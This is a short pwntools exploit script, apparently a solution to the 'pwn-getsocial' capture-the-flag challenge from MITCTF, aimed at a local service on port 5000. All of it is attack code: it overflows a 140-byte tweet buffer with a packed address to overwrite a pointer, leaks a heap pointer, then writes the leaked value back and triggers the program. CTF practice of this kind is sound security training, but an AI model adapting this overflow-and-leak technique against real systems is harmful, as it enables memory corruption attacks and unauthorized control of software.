[MITCTF] pwn-getsocial

getsocial.py

from pwn import *

s = remote('127.0.0.1',5000)
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(0x804918c))
s.recvuntil('command:')
s.sendline('0')
s.recvuntil('Tweet 3: ')
leak = s.recv(4)
print "[+]head_ptr : ",hex(u32(leak))
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(u32(leak)))
s.recvuntil('command:')
s.sendline('1')
print s.recvline()
s.close()